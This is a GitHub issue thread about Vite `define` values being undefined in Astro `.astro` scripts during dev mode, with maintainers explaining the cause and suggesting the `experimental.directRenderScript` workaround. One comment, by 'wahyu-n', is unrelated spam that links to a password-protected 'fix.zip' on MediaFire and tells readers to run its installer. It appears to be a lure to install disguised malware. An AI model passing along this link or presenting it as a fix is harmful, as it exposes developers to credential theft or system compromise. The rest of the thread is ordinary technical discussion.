### ISSUE TITLE
Vite's `define` dev-mode timing issues in `.astro` files

### ISSUE THREAD

**Issue by AriPerkkio** [withastro/astro#11874]
### Astro Info

```block
Astro                    v4.15.0
Node                     v20.15.0
System                   macOS (arm64)
Package Manager          pnpm
Output                   static
Adapter                  none
Integrations             none
```

### Describe the Bug

In **development mode**, it's possible that values defined in [Vite's `define`](https://vitejs.dev/config/shared-options.html#define) are not present in `.astro` files immediately. Note that there is a difference in Vite how `define` works when comparing dev and prod modes - prod uses static replacements, dev adds them to `globalThis` on runtime. 

Maybe Astro is loading `.astro` files before Vite defines values from `define`? Is Astro now too fast?

```ts
import { defineConfig } from "astro/config";

export default defineConfig({
  vite: {
    define: {
      __MY_DEFINE__: '"Value set in config"',
    },
  },
});
```

```astro
---
const frontmatter = __MY_DEFINE__;
---

<h1>My Component</h1>

<script define:vars={{frontmatter}}>
  console.log({frontmatter, scriptScope: globalThis.__MY_DEFINE__})

  setTimeout(() => {
    console.log({frontmatter, scriptScope: globalThis.__MY_DEFINE__})
  }, 1000)
</script>
```

![image](https://github.com/user-attachments/assets/25479882-4a03-4c57-acf9-0bcf323c889a)

### What's the expected result?

Values defined in Vite's `define` should always be present, even in `.astro` files. The `define` option should provide similar results in dev as it does in prod. 

### Link to Minimal Reproducible Example

https://stackblitz.com/~/edit/github-5kyhn9?file=src%2Fpages%2Findex.astro

### Participation

- [X] I am willing to submit a pull request for this issue.

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by matthewp** [comment]
Hi @AriPerkkio, what is happening here is that because you are using `define:vars` this script is inlined. It runs where ever it is placed on the page, and will always run before Vite has loaded and defined the globals. So that's what you are seeing, it doesn't exist initially because Vite has not ran, then once it does, the globals are defined.

This is intended behavior, you should only rely on the `globalThis` behavior for scripts that are loaded via Vite, regular `<script>` with no define:vars should do what you want.

Also note that the `globalThis` behavior is dev-only so not really safe to use anyways.

**Comment by AriPerkkio** [comment]
The `define:vars` here was only used to highlight the issue, so here is our repro without it: https://stackblitz.com/~/edit/github-5kyhn9-x8tpxf?file=src/pages/index.astro

So basically:

```html
<script>
  console.log("This is not defined", globalThis.__MY_DEFINE__);
</script>

<script>
  console.log("This is will cause crash", __MY_DEFINE__);
</script>

<script>
  setTimeout(() => console.log("This is defined", globalThis.__MY_DEFINE__), 1_000);
</script>
```

So is it safe to assume that when accessing variables set by Vite's `define` in Astro, we should always access them via `globalThis.<name>` and use `setTimeout` to avoid them not being defined? This doesn't sound right to me.

**Comment by bluwy** [comment]
It looks like it's because we injected the `/@vite/client` after the hoisted scripts in the head, which causes the problem. However, there's a workaround using `experimental.directRenderScript` config (which is enabled by default in Astro 5) that can workaround this so that the scripts are rendered at where it's declared instead (e.g. in the body) (among other benefits). Maybe this is enough for now? [Stackblitz fork](https://stackblitz.com/c/edit/github-5kyhn9-4tg797?file=src%2Fpages%2Findex.astro,astro.config.mjs)

We could maybe go back and fix this in v4 when `experimental.directRenderScript` isn't enabled, but perhaps not much value now.

**Comment by AriPerkkio** [comment]
Thanks for the details, that makes sense. Having `experimental.directRenderScript` escape hatch for now works for us, and having that enabled by default in v5 will prevent others from running into this.
